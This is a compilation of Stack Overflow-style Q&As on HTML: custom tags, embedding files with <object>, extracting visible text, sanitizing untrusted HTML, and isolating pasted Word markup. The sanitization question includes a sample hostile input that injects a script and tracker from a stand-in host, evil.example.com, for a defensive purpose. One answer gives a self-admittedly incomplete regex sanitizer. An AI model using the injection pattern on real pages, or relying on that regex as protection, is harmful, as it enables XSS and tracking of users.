I was inspecting today's Google Doodle of the Moog synth, dedicated to Robert Moog, when I came across the following piece of HTML code:
<w id=moogk0></w>
<s id=moogk1></s>
<w id=moogk2></w>
<s id=moogk3></s>
(You can view the source & do a Ctrl+F for moogk; you will get it in the first search result.)
I googled about the s & w tags but found nothing useful, except that the s tag is sometimes used to strike out text but is now deprecated.
Obviously Google will not be using deprecated tags, but I guess there's a lot more behind this than plain HTML code. Can anybody explain the use of these tags? How does the browser recognise them? And if the browser does not recognise them, what's their use?
The browser doesn't recognise them.
But HTML was designed to ignore what it doesn't recognise, so these are simply not understood by the browser and get ignored. As elements without content, they will not get rendered at all either, though they will be part of the DOM.
However, these can be styled directly as elements in CSS and picked up by JavaScript (getElementsByTagName, getElementById, etc.).
In short, these elements provide a target for CSS and JavaScript without any other impact on display.
Unknown elements are rendered inline by default (the initial CSS display value, like span), but they can be styled however you like and used in scripts.
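A minimal sketch (not the doodle's actual code) showing both ideas:
<style>
/* the unknown element has no default styling, so give it dimensions */
w { display: inline-block; width: 20px; height: 80px; background: ivory; }
</style>
<w id="moogk0"></w>
<script>
// it is an ordinary DOM node, reachable like any other element
document.getElementById('moogk0').style.background = 'gold';
console.log(document.getElementsByTagName('w').length); // 1
</script>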
The tags you are talking about are user-created XML tags.
If you need to display dynamic data in your HTML document, it will take a lot of work to edit the HTML each time the data changes. With XML, data can be stored in separate XML files. This way you can concentrate on using HTML/CSS for display and layout, and be sure that changes in the underlying data will not require any changes to the HTML. With a few lines of JavaScript code, you can read an external XML file and update the data content of your web page.
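A minimal sketch of that idea (the file name data.xml, the price element, and the target id are made up for illustration):
// read a hypothetical external XML file and inject one value into the page
fetch('data.xml')
  .then(function (response) { return response.text(); })
  .then(function (text) {
    var xml = new DOMParser().parseFromString(text, 'application/xml');
    var price = xml.querySelector('price'); // assumed element in data.xml
    document.getElementById('price').textContent =
        price ? price.textContent : 'n/a';
  });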
I am looking for a simple way to make my website modular and extract common parts that appear often like header and footer into separate files.
In my case, I cannot use any server-side includes with e.g. PHP. I also generally would like to avoid including big libraries like jQuery just for such a simple task.
Now I came across https://stackoverflow.com/a/691059/4464570 which suggests to simply use an HTML <object> tag to include another HTML file into a page, like this:
<object data="parts/header.html" type="text/html">header goes here</object>
I might be missing something important here, but to me this way seems to perfectly fit my needs. It is very short and precise, the <object> tag is well supported by all browsers, I don't need to include any big libraries and actually I don't even need any JavaScript, which allows users blocking that to still view the correct page structure and layout.
So are there any disadvantages with this approach that I'm not yet aware of? The main reason for my doubts is that out of dozens of answers on how to include HTML fragments, only one recommended <object> while all others went for a PHP or JavaScript/jQuery way.
Furthermore, do I have to pay attention to anything special regarding how to put the <object> tag into my main page, or regarding the structure of the file I want to include this way? Like, may the embedded file be a complete HTML document with <!DOCTYPE>, <html>, <head> and <body> or should/must I strip all those structures and leave only the inner HTML elements? Is there anything special about using JavaScript or CSS inside HTML embedded this way?
The use of the <object> tag for HTML content is very similar to the use of an <iframe>. Both just load a webpage as a separate document inside a frame that is itself a child of your main document.
Frames used to be very popular in the early days of web development, then in the form of the <frame> tag. They are generally frowned upon, however, and you should really use them as little as possible.
Why not to use this technique for displaying your own content
The HTML content in the child frame cannot easily communicate with the parent. Scripts in the parent can only reach the child through the frame's contentDocument, and only when both documents are same-origin; cross-origin content is walled off entirely. That makes it not very useful for serving your own content when you want to display anything but static text.
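To illustrate the awkwardness, a sketch assuming the same-origin header include from the question:
var frame = document.querySelector('object[data="parts/header.html"]');
frame.addEventListener('load', function () {
  // contentDocument is non-null only for same-origin content
  if (frame.contentDocument) {
    console.log(frame.contentDocument.title); // the child is a whole separate document
  }
});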
Why not to use this technique for displaying someone else's content
You can't use it to serve a lot of external content either. Many websites (including, e.g., Stack Overflow) send an X-Frame-Options header along with their webpage that has the value SAMEORIGIN. This prevents their pages from being loaded and displayed inside your frames.
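For example, a response carrying that header (an illustrative excerpt) will simply refuse to render inside your <object> or <iframe>:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN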
OK, I know how to include HTML content from a separate file using the <object> tag. What I can't find any info about is what is allowed/required within the included HTML file. Can said included file merely be some text with some HTML tags, or does it have to be a complete HTML file with headers, <head>, and <body>? How does this appear within the DOM of the original document, if it appears within that DOM at all? Or are the two documents treated entirely separately?
Yes, I know, I could experiment to see what works. However, I know enough about HTML to know that what happens to work, for now, may not be the correct way to do things. I am not expecting anyone to list out all the rules here, but if someone could post some links I would much appreciate it. This is a topic that has proven exceedingly difficult to search the internet for.
In 13.5 Notes on embedded documents, I believe I have found the answer to both of my questions. The second paragraph says,
An embedded document is entirely independent of the document in which it is embedded. For instance, relative URIs within the embedded document resolve according to the base URI of the embedded document, not that of the main document. An embedded document is only rendered within another document (e.g., in a subwindow); it remains otherwise independent.
So, yes, as both @Quentin and @Sinan said, it would require the embedded .html file to be a complete, valid .html file. And, no, it would not become part of the DOM of the original document.
Thanks to everyone for their prompt assistance. The StackOverflow community continues to amaze me.
<object> is a way to include a generic media object.
An HTML document is an example of such.
The HTML spec doesn't describe a means to provide a fragment of HTML to a browser, only a complete document. There is no standard MIME type for a fragment of HTML.
Therefore: You should use complete HTML documents.
That said, if you are going down that route, you would almost certainly be better off using <iframe> which has a much more featureful and robust set of APIs and documentation surrounding it.
How does this appear within the DOM of the original document, if it appears within that DOM at all?
As an object element. The child nodes of which are whatever alternative content you provide between the start and end tag.
Or are the two documents treated entirely separately?
Yes, much like an iframe.
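Following that advice, an included file would itself be a small but complete document; a hypothetical parts/header.html might look like:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Header</title>
</head>
<body>
<h1>My Site</h1>
</body>
</html>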
<object> in HTML5 and <object> in HTML4.
The object element represents external content, which, depending on the type of the content, will either be treated as an image, as a nested browsing context, or as external content to be processed by a plugin.
Motivation from HTML4:
Previous versions of HTML allowed authors to include images (via IMG) and applets (via APPLET). These elements have several limitations:
They fail to solve the more general problem of how to include new and future media types.
The APPLET element only works with Java-based applets. This element is deprecated in favor of OBJECT.
They pose accessibility problems.
To address these issues, HTML 4 introduces the OBJECT element, which offers an all-purpose solution to generic object inclusion. The OBJECT element allows HTML authors to specify everything required by an object for its presentation by a user agent: source code, initial values, and run-time data. In this specification, the term "object" is used to describe the things that people want to place in HTML documents; other commonly used terms for these things are: applets, plug-ins, media handlers, etc. (emphasis mine)
So, basically, <object> elements are pretty generic. The only real condition is that there needs to be some kind of functionality on the client side to render the element.
For example:
<object data="test.html" height="50" width="50"></object>
renders the contents of test.html in a tiny area (no scaling!) in Firefox, whereas the text-mode browser Links just displays [OBJ].
Embedded Content explains what happens when an <object> element is encountered.
Due to the algorithm above, the contents of object elements act as fallback content, used only when referenced resources can't be shown (e.g. because it returned a 404 error). This allows multiple object elements to be nested inside each other, targeting multiple user agents with different capabilities, with the user agent picking the first one it supports. (emphasis mine)
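That nesting looks like this in practice (a sketch with made-up file names): the user agent tries the SVG, falls back to the HTML version, and finally to plain text.
<object data="clock.svg" type="image/svg+xml">
<object data="clock.html" type="text/html">
Sorry, your browser can't show the clock.
</object>
</object>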
I believe that answers the question of how the <object> enters the DOM. If it were any other way, for example, element ids in included documents could trample on the DOM of the host page.
Regardless of what capabilities you observe in current user agents, you should ensure included HTML documents are well-structured and valid.
Further down, consider the included example:
In this example, an HTML page is embedded in another using the object element.
<figure>
<object data="clock.html"></object>
<figcaption>My HTML Clock</figcaption>
</figure>
Note the example refers to an HTML page — not a fragment.
Having the HTML of a webpage, what would be the easiest strategy to get the text that's visible on the corresponding page? I have thought of getting everything that's between the <a>...</a> and <p>...</p> tags, but that is not working that well.
Keep in mind that this is for a school project: I am not allowed to use any kind of external library (the idea is that I have to do the parsing myself). Also, this will be implemented as the HTML of the page is downloaded; that is, I can't assume I already have the whole HTML page downloaded. It has to show the extracted visible words as the HTML is being downloaded.
Also, it doesn't have to work for ALL cases, just to be satisfactory most of the time.
I am not allowed to use any kind of external library
This is a poor requirement for a ‘software architecture’ course. Parsing HTML is extremely difficult to do correctly, certainly way outside the bounds of a course exercise. Any naïve approach you come up with involving regex hacks is going to fall over badly on common web pages.
The software-architecturally correct thing to do here is use an external library that has already solved the problem of parsing HTML (such as, for .NET, the HTML Agility Pack), and then iterate over the document objects it generates looking for text nodes that aren't in ‘invisible’ elements like <script>.
If the task of grabbing data from web pages is of your own choosing, to demonstrate some other principle, then I would advise picking a different challenge, one you can usefully solve. For example, just changing the input from HTML to XML might allow you to use the built-in XML parser.
Literally all the text that is visible sounds like a big ask for a school project, as it would depend not only on the HTML itself but also on any in-page or external styling. One solution would be to simply strip the HTML tags from the input, though that wouldn't strictly meet your requirements as you have stated them.
Assuming that near enough is good enough, you could make a first pass to strip out the content of entire elements which you know won't be visible (such as script, style), and a second pass to remove the remaining tags themselves.
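A rough sketch of those two passes (JavaScript for illustration, assuming the markup received so far is in a string html; any regex-based approach like this stays approximate):
// pass 1: remove elements whose content is never visible
var cleaned = html.replace(/<(script|style)\b[^>]*>[\s\S]*?<\/\1>/gi, '');
// pass 2: remove the remaining tags, keeping their text content
var text = cleaned.replace(/<[^>]+>/g, ' ');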
I'd consider writing a regex to remove all HTML tags; you should be left with your desired text. This can be done in JavaScript and doesn't require anything special.
I know this is not exactly what you asked for, but it can be done using Regular Expressions:
//JavaScript code
//should (could) work in C# (needs escaping for quotes):
h = h.replace(/<(?:"[^"]*"|'[^']*'|[^'">])*>/g, '');
This RegExp will remove HTML tags; note, however, that you first need to remove the script, link, style, ... tags.
If you decide to go this way, I can help you with the regular expressions needed.
HTML5 includes a detailed description of how to build a parser. It is probably more complicated than you are looking for, but it is the recommended way.
You'll need to parse every DOM element for text, and then detect whether that DOM element is visible (via its computed style, since el.style only reflects inline styles), and then you'll need to detect whether that element is positioned in such a manner that it isn't outside of the viewable area of the page. Then you'll need to detect the z-index of each element and the background of each element in order to detect whether any overlapping is hiding some text.
Basically, this is impossible to do within a month's time.
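Even the first of those steps is non-trivial on its own; a sketch of just the visibility check (ignoring overlap and viewport clipping):
function isRendered(el) {
  // computed style reflects stylesheets too, not just the style attribute
  var cs = window.getComputedStyle(el);
  return cs.display !== 'none' && cs.visibility !== 'hidden';
}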
This is a common problem, I'm hoping it's been thoroughly solved for me.
In a system I'm doing for a client, we want to accept HTML from untrusted sources (HTML-formatted email and also HTML files), sanitize it so it doesn't have any scripting, links to external resources, and other security/etc. issues; and then display it safely while not losing the basic formatting. E.g., much as an email client would do with HTML-formatted email, but ideally without repeating the 347,821 mistakes that have been made (so far) in that arena. :-)
The goal is to end up with something we'd feel comfortable displaying to internal users via an iframe in our own web interface, or via the WebBrowser class in a .Net Windows Forms app (which seems to be no safer, possibly less so), etc. Example below.
We recognize that some of this may well muck up the display of the text; that's okay.
We'll be sanitizing the HTML on receipt and storing the sanitized version (don't worry about the storage part — SQL injection and the like — we've got that bit covered).
The software will need to run on Windows Server. COM DLL or .Net assembly preferred. FOSS markedly preferred, but not a deal-breaker.
What I've found so far:
The AntiSamy.Net project (but it appears to no longer be under active development, being over a year behind the main — and active — AntiSamy Java project).
Some code from our very own Jeff Atwood, circa three years ago (gee, I wonder what he was doing...).
The HTML Agility Pack (used by the AntiSamy.Net project above), which would give me a robust parser; then I could implement my own logic for walking through the resulting DOM and filtering out anything I didn't whitelist. The agility pack looks really great, but I'd be relying on my own whitelist rather than reusing a wheel that someone's already invented, so that's a ding against it.
The Microsoft Anti-XSS library
What would you recommend for this task? One of the above? Something else?
For example, we want to remove things like:
script elements
link, img, and such elements that reach out to external resources (probably replace img with the text "[image removed]" or some such)
embed, object, applet, audio, video, and other tags that try to create objects
onclick and similar DOM0 event handler script code
hrefs on <a> elements that trigger code (even links we think are okay, we may well turn into plain text that users have to intentionally copy and paste into a browser).
__________ (the 722 things I haven't thought of that are the reason I'm looking to leverage something that already exists)
So for instance, this HTML:
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
<link rel="stylesheet" type="text/css" href="http://evil.example.com/tracker.css">
</head>
<body>
<p onclick="(function() { var s = document.createElement('script'); s.src = 'http://evil.example.com/scriptattack.js'; document.body.appendChild(s); })();">
<strong>Hi there!</strong> Here's my nefarious tracker image:
<img src='http://evil.example.com/xparent.gif'>
</p>
</body>
</html>
would become
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
</head>
<body>
<p>
<strong>Hi there!</strong> Here's my nefarious tracker image:
[image removed]
</p>
</body>
</html>
(Note we removed the link and the onclick entirely, and replaced the img with a placeholder. This is just a small subset of what we figure we'll need to strip out.)
This is an older, but still relevant question.
We are using the HtmlSanitizer .NET library, which:
is open-source
is actively maintained
doesn't have the problems of the Microsoft Anti-XSS library
is unit tested with the OWASP XSS Filter Evasion Cheat Sheet
is purpose-built for this (in contrast to the HTML Agility Pack, which is a parser)
It is also available on NuGet.
I sense you would definitely need a parser that can generate an XML/DOM source so that you can apply a filter on it to produce what you are looking for.
See if the HtmlTidy, Mozilla, or HtmlCleaner parsers can help. HtmlCleaner has a lot of configurable options which you might also want to look at, specifically the transform section that allows you to skip the tags you don't require.
I would suggest using another approach. If you control the method by which the HTML is viewed, I would remove all threats by using an HTML renderer that doesn't have an ECMAScript engine or any XSS capability. I see you are going to use the built-in WebBrowser object, and rightly so: you want to produce HTML that cannot be used to attack your users.
I recommend looking for a basic HTML display engine, one that cannot parse or understand any of the scripting functionality that would make you vulnerable. All the JavaScript would then just be ignored.
This does have another problem though. You would need to ensure that the viewer you are using isn't susceptible to other types of attacks.
I suggest looking at http://htmlpurifier.org/. Their library is pretty complete.
Interesting problem; I took some time facing it, because there are a lot of things we want to remove from user input, and even if I make a long list of things to be removed, HTML can evolve later on and my list would have holes.
Nonetheless, I want users to input some simple things like bold, italic, paragraphs... pretty simple.
No doubt the list of allowed things is shorter, and if HTML changes later on, that won't make holes in my list unless HTML stops supporting these simple things.
So, thinking the other way around, state just what you allow. With great pain, because I'm not an expert on regex (so please, some regex people, correct or improve this), I coded this expression, and it has been working for me since before HTML5 arrived.
replace(/(?!<[/]?(b|i|p|br)(\s[^<]*>|[/]>|>))<[^>]*>/gi,"")
(b|i|p|br) <- this is the list of allowed tags; feel free to add some.
This is a starting point, and that's why some regex people should improve it to also remove the attributes, like onclick.
If I do this:
(?!<[/]?(b|i|p|br)(\s*>|[/]>|>))<[^>]*>
tags with onclick or other attributes will be removed, but the corresponding closing tags will remain; and after all, we don't want those tags removed, we just want to remove the tag attributes.
Maybe a second regex pass with
(?!<[^<>\s]+)\s[^</>]+(?=[/>])
Am I right? Can this be composed into a single pass?
We still have no relation between tags (opening/closing); no great deal till now.
Can the attribute removal be written to remove everything not on a whitelist? (Possibly, yes.)
One last problem: when removing tags like script, the content remains. That's desirable when removing font, but not script. Well, we can do a first pass with
<(script|object|embed)[^>]*>.*</\1>
which will remove certain tags and their content. But it's a blacklist, meaning you have to keep an eye on it in case HTML changes.
Note: all with "gi".
Edit:
I joined all of the above in this function:
String.prototype.sanitizeHTML = function (white, black) {
  if (!white) white = "b|i|p|br";            // allowed tags
  if (!black) black = "script|object|embed"; // tags removed together with their content
  // 1st alternative: blacklisted tags plus content; 2nd: any tag not whitelisted;
  // 3rd: attributes left on the remaining (whitelisted) tags
  var e = new RegExp("(<(" + black + ")[^>]*>.*</\\2>|(?!<[/]?(" + white + ")(\\s[^<]*>|[/]>|>))<[^<>]*>|(?!<[^<>\\s]+)\\s[^</>]+(?=[/>]))", "gi");
  return this.replace(e, "");
};
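An illustrative call (the input string is made up; behavior follows the rules listed below):
var dirty = '<script>alert(1)<\/script><p onclick="alert(2)">Hi <b>there</b></p>';
console.log(dirty.sanitizeHTML()); // -> <p>Hi <b>there</b></p>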
- blacklist -> tag and its content are removed completely
- whitelist -> tags are retained
Other tags are removed, but their content is retained.
All attributes of the whitelisted tags (the remaining ones) are removed.
There is still room for a whitelist of attributes (not implemented above), because if I want to preserve IMG then the src must stay... and what about tracking images?
I've got an input where the user can type either HTML or plain text. When the user copies & pastes text from MS Word, for example, it generates weird HTML. Then, when you view that topic, you can see the whole page's style is affected. I don't really know if the generated HTML has unclosed tags or something, but it looks like it does, and thus the style of the page is affected.
Does anybody know how to "isolate" the HTML of that div (or whatever the container may be) from the whole page's style?
Short of showing the content in an IFRAME, you can't really do that. What I usually do in this situation is apply tag stripping logic to the content as it comes in. You really don't want to allow arbitrary HTML from a security perspective, but even if you don't care what your users input, you should be stripping out invalid HTML tags (Word has a habit of creating tags with weird namespace-looking things like o:p) and running something like Tidy over the result to ensure every tag is properly closed. There are a number of Tidy libraries for .NET out there; here's one.
Here's a quick cut-and-paste of how I've done this in the past. Note that the class implements an interface from the project I used it in, but you get the general idea.
Copying text from Word can include <style> tags. The only sure way to isolate these styles is to put the input control in an <iframe>.
You can either sanitize the input or display it in an IFrame.
If it were me, I'd strip all but basic formatting (e.g., bold, italics) and use Tidy. That's what I ended up doing: I strip and convert all of Word's CSS styles into <strong>, <em>, etc.
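A rough sketch of that conversion step (JavaScript for illustration; the styled span and font elements are the kind Word typically produces, and a real implementation would run on an already-sanitized DOM):
// replace Word's styled spans with semantic tags, unwrapping everything else
function convertWordStyles(root) {
  root.querySelectorAll('span, font').forEach(function (el) {
    var css = el.getAttribute('style') || '';
    var tag = /font-weight:\s*bold/i.test(css) ? 'strong'
            : /font-style:\s*italic/i.test(css) ? 'em' : null;
    var repl = tag ? document.createElement(tag)
                   : document.createDocumentFragment();
    while (el.firstChild) repl.appendChild(el.firstChild);
    el.parentNode.replaceChild(repl, el);
  });
}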